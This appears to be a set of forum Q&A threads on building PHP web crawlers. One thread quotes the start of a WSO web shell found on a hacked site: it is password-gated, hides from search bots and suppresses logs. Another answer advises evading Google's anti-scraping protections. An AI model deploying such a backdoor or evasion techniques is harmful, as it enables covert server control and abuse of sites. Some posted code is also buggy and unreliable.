i am currently developing a web crawler in PHP and it still is a simple one but what i want to know is how can i make my crawler to crawl pages in background and not use my bandwidth, do i have to use some cron jobs and i want it to automatically store the data in database.
Here what i have done:
<?php
$conn = mysqli_connect("localhost","root","","crawler") or die(mysqli_error());
ini_set('max_execution_time', 4000);
$to_crawl = "http://hootpile.com";
$c = array();
function get_links($url){
global $c;
$input = file_get_contents($url);
$regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
preg_match_all("/$regexp/siU", $input, $matches);
$base_url = parse_url($url, PHP_URL_HOST);
$l = $matches[2];
foreach($l as $link) {
if(strpos($link, "#")) {
$link = substr($link,0, strpos($link, "#"));
}
if(substr($link,0,1) == ".") {
$link = substr($link, 1);
}
if(substr($link,0,7)=="http://") {
$link = $link;
}
else if(substr($link,0,8) =="https://") {
$link = $link;
}
else if(substr($link,0,2) =="//") {
$link = substr($link, 2);
}
else if(substr($link,0,2) =="#") {
$link = $url;
}
else if(substr($link,0,2) =="mailto:") {
$link = "[".$link."]";
}
else {
if(substr($link,0,1) != "/") {
$link = $base_url."/".$link;
}
else {
$link = $base_url.$link;
}
}
if(substr($link, 0, 7)=="http://" && substr($link, 0, 8)!="https://" && substr($link, 0, 1)=="[") {
if(substr($url, 0, 8) == "https://") {
$link = "https://".$link;
}
else {
$link = "http://".$link;
}
}
//echo $link."<br />";
if(!in_array($link,$c)) {
array_push($c,$link);
}
}
}
get_links($to_crawl);
foreach ($c as $page) {
get_links($page);
}
foreach ($c as $page) {
$query = mysqli_query($conn,"INSERT INTO LINKS VALUES('','$page')");
echo $page."<br />";
}
?>
You can use SimpleHTML Dom, But crawling/scraping depend on the web page structure. How many data you want to store, May be you can't found same data and structure on different websites. In case you should make some common program to fetch data from scraped data.
You can use ReactPHP, since it allows you to easily spawn a process that keeps running.
You also can write a hashbang at the very beggining of the file:
#/usr/bin/php
give execution permissions to the file:
chmod a+x your_script_path.php
and execute it with cron or with nohup. If you want to daemonize it, then there is a little more work.
I think you should not use PHP for crawler/scraper because it's not designed for long-running tasks. It will cause memory usage problem, use Python instead (I use Python + BeautifulSoup + urllib for scraper).
Besides you should use crontab and nohup to schedule background jobs.
Related
I have limited the crawl to a single website. I have also tried to use function linkExists to stop crawling existing links, but the script doesn't stop till it times out. How can I fix that?
I am quite happy to stop the script at a fixed number of loops.
I have been doing a course online on building a search engine and have made a few changes to the original script because I found it to be a little inefficient, yet the main problem still occurs.
There is a problem withing Function linkExists that I am also trying to solve. The original script uses linkExists at the point of inputting to the database and I want to exclude it before crawling.
function LinkExists($url) {
global $con;
$query = $con->prepare("SELECT url FROM sites WHERE url = :url");
$query->bindParam(":url",$url);
$query->execute();
$indata = $query->fetch_Column("url");
}
return $query->rowCount() != 0;
}
function followLinks($url) {
global $alreadyCrawled;
global $crawling;
global $hosta;
global $indata;
$parser = new DomDocumentParser($url);
$linkList = $parser->getLinks();
foreach($linkList as $link) {
$href = $link->getAttribute("href");
if((substr($href, 0, 3) !== "../") AND (strpos($href, $hosta) === false)) {
continue;
}
else if(strpos($href, "#") !== false) {
continue;
}
else if(substr($href, 0, 11) == "javascript:") {
continue;
}
if(LinkExists($indata) !== "") {
$alreadyCrawled[] = array_merge($indata, $alreadyCrawled);
}
$href = createLink($href, $url);
if(!in_array($href, $alreadyCrawled)) {
$alreadyCrawled[] = $href;
$crawling[] = $href;
getDetails($href);
}
}
array_shift($crawling);
foreach($crawling as $site) {
followLinks($site);
}
I would like to scrape the google search result up to page 2 but i'm having trouble on the result of blank page of my website or timeout.
for($j=0; $j<$acount; $j++){
sleep(60);
for($sp = 0; $sp <= 10; $sp+=10){
$url = 'http://www.google.'.$lang.'/search?q='.$in.'&start='.$sp;
if($sp == 10){
$datenbank = "proxy_work.php";
$datei = fopen($datenbank,"a+");
fwrite($datei, $data);
fwrite ($datei,"\r\n");
fclose($datei);
} else {
$datenbank = "proxy_work.php";
$datei = fopen($datenbank,"w+");
fwrite($datei, $data);
fwrite ($datei,"\r\n");
fclose($datei);
}
}
$html = file_get_html("proxy_work.php");
foreach($html->find('a') as $e){
// $title = $h3->innertext;
$link = $e->href;
if(in_array($endomain, $approveurl)){
}
// if it is not a direct link but url reference found inside it, then extract
if (!preg_match('/^https?/', $link) && preg_match('/q=(.+)&sa=/U', $link, $matches) && preg_match('/^https?/', $matches[1])) {
$link = $matches[1];
} else if (!preg_match('/^https?/', $link)) { // skip if it is not a valid link
continue;
}
}
}
Google search result pages (SERP) are not like a common website with static html. Google preserves its data from web scraping. Consider its data as a business directory and see the following tips for business directory scrape:
IP-proxying.
Imitating human behaviour by using some browser automation tools (Selenium, iMacros and others).
Read more here.
A website was hacked and I found a strange new php file on it. I have already deleted all the files and the database before changing the host credentials, but I would like to know what else should I be double-check before going back live with a backup?
Are there any other extra measures to be taken for the future - as in: how do I find how it got there?
Here is a piece of code and the pastebin since the code is too long:
<?php
$auth_pass = "fadf17141f3f9c3389d10d09db99f757";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
#ini_set('error_log',NULL);
#ini_set('log_errors',0);
#ini_set('max_execution_time',0);
#set_time_limit(0);
#set_magic_quotes_runtime(0);
#define('WSO_VERSION', '2.5.1');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';
$safe_mode = #ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = #ini_get('disable_functions');
$home_cwd = #getcwd();
if(isset($_POST['c']))
#chdir($_POST['c']);
$cwd = #getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
https://pastebin.com/J37Xvk9v
This is a backdoor. Hackers can acces this page(php file) to enter commands on your server. This way they can hack you again even when you change your password.
Always delete such files and there is a optertunity he hided more pages like these.
I'm trying to get the title of a website that is entered by the user.
Text input: website link, entered by user is sent to the server via AJAX.
The user can input anything: an actual existing link, or just single word, or something weird like 'po392#*#8'
Here is a part of my PHP script:
// Make sure the url is on another host
if(substr($url, 0, 7) !== "http://" AND substr($url, 0, 8) !== "https://") {
$url = "http://".$url;
}
// Extra confirmation for security
if (filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_HOST_REQUIRED)) {
$urlIsValid = "1";
} else {
$urlIsValid = "0";
}
// Make sure there is a dot in the url
if (strpos($url, '.') !== false) {
$urlIsValid = "1";
} else {
$urlIsValid = "0";
}
// Retrieve title if no title is entered
if($title == "" AND $urlIsValid == "1") {
function get_http_response_code($theURL) {
$headers = get_headers($theURL);
if($headers) {
return substr($headers[0], 9, 3);
} else {
return 'error';
}
}
if(get_http_response_code($url) != "200") {
$urlIsValid = "0";
} else {
$file = file_get_contents($url);
$res = preg_match("/<title>(.*)<\/title>/siU", $file, $title_matches);
if($res === 1) {
$title = preg_replace('/\s+/', ' ', $title_matches[1]);
$title = trim($title);
$title = addslashes($title);
}
// If title is still empty, make title the url
if($title == "") {
$title = $url;
}
}
}
However, there are still errors occuring in this script.
It works perfectly if an existing url as 'https://www.youtube.com/watch?v=eB1HfI-nIRg' is entered and when a non-existing page is entered as 'https://www.youtube.com/watch?v=NON-EXISTING', but it doesn't work when the users enters something like 'twitter.com' (without http) or something like 'yikes'.
I tried literally everthing: cUrl, DomDocument...
The problem is that when an invalid link is entered, the ajax call never completes (it keeps loading), while it should $urlIsValid = "0" whenever an error occurs.
I hope someone can help you - it's appreciated.
Nathan
You have a relatively simple problem but your solution is too complex and also buggy.
These are the problems that I've identified with your code:
// Make sure the url is on another host
if(substr($url, 0, 7) !== "http://" AND substr($url, 0, 8) !== "https://") {
$url = "http://".$url;
}
You won't make sure that that possible url is on another host that way (it could be localhost). You should remove this code.
// Make sure there is a dot in the url
if (strpos($url, '.') !== false) {
$urlIsValid = "1";
} else {
$urlIsValid = "0";
}
This code overwrites the code above it, where you validate that the string is indeed a valid URL, so remove it.
The definition of the additional function get_http_response_code is pointless. You could use only file_get_contents to get the HTML of the remote page and check it against false to detect the error.
Also, from your code I conclude that, if the (external to context) variable $title is empty then you won't execute any external fetch so why not check it first?
To sum it up, your code should look something like this:
if('' === $title && filter_var($url, FILTER_VALIDATE_URL))
{
//# means we suppress warnings as we won't need them
//this could be done with error_reporting(0) or similar side-effect method
$html = getContentsFromUrl($url);
if(false !== $html && preg_match("/<title>(.*)<\/title>/siU", $file, $title_matches))
{
$title = preg_replace('/\s+/', ' ', $title_matches[1]);
$title = trim($title);
$title = addslashes($title);
}
// If title is still empty, make title the url
if($title == "") {
$title = $url;
}
}
function getContentsFromUrl($url)
{
//if not full/complete url
if(!preg_match('#^https?://#ims', $url))
{
$completeUrl = 'http://' . $url;
$result = #file_get_contents($completeUrl);
if(false !== $result)
{
return $result;
}
//we try with https://
$url = 'https://' . $url;
}
return #file_get_contents($url);
}
I am building a search engine and webcrawler using PHP, and i would like to detect the language of a website, how would i detect the language of a page by:
Checking the URL for https://twitter.com/?lang=jap
if that is not set then i would like to:
Check the URL https://www.google.co.jp/
if i still can't find anything then i would to set default to English
the code i have so far for scraping pages is:
function crawl($url){
$html = file_get_html($url);
if($html && is_object($html) && isset($html->nodes)){
$weblinks[]=$url;
foreach($html->find('a') as $element) {
global $weblinks;
$link = $element->href;
$base_url = parse_url($url, PHP_URL_HOST);
if(substr($link,0,7)=="http://"){
$link = $link;
}else if(substr($link,0,8)=="https://"){
$link = $link;
}else if(substr($link,0,2)=="//"){
$link = substr($link, 2);
}else if(substr($link,0,1)=="#"){
$link = $html;
}else if(substr($link,0,7)=="mailto:"){
$link = "";
}else if(substr($link,0,11)=="javascript:"){
$link = "";
}else{
if(substr($link, 0, 1) != "/"){
$link = $base_url."/".$link;
}else{
$link = $base_url . $link;
}
}
if(substr($link, 0, 7) != "http://" && substr($link, 0, 8) != "https://" && $link != ""){
if(substr($url, 0, 8) == "https://"){
$link = "https://".$link;
}else{
$link = "http://".$link;
}
}
if(!in_array($link, $weblinks)){
$weblinks[]=$link;
}
}
$html->clear();
}else{
}
}
function info($weblinks){
foreach($weblinks as $link) {
$linkhtml = file_get_html("$link");
if($linkhtml && is_object($linkhtml) && isset($linkhtml->nodes)){
$titleraw = $linkhtml->find('title',0);
$title = $titleraw->innertext;
$des = $linkhtml->find("meta[name='description']",0)->content;
//detect language here
echo "<tr><td>".$title."</td><td>".$link."</td><td>".$des."</td></tr>";
$sql = mysql_query("INSERT into web once");
$title = "";
$des = "";
$linkhtml->clear();
}
}
}
To get the language from ?lang=:
$url = 'www.domain.org?lang=IT';
$url_parts = parse_url($url);
$lang = parse_str($url_parts['lang']);
You should then validate this with a switch/case statement and a list of languages that you support, like this:
switch ($lang) {
case 'EN':
//language is English
break;
case 'IT':
//language is Italian
break;
case 'FR':
//language is French
break;
default:
//?lang query was empty, or contained an unsupported language
$lang = FALSE;
} //end switch
After that, you can use this logic to determine whether you need to check the URL for the language:
if ($lang == FALSE) {
//code to determine language from TLD
}
Hopefully this will help get you started, although this is a big can of worms you're opening up. There are other things you need to check in order to be certain of the language of a website in addition to what you've mentioned. One of them is the language meta tag, which is like this: <meta name="language" content="english"> and goes in the head of the webpage, though not all websites use it.
Some multilingual websites, like mine, use a subdomain like http://it.website.com or http://fr.website.com
Others use query strings that are different from ?lang=. So you'll need to do a significant amount of research to cover all your bases.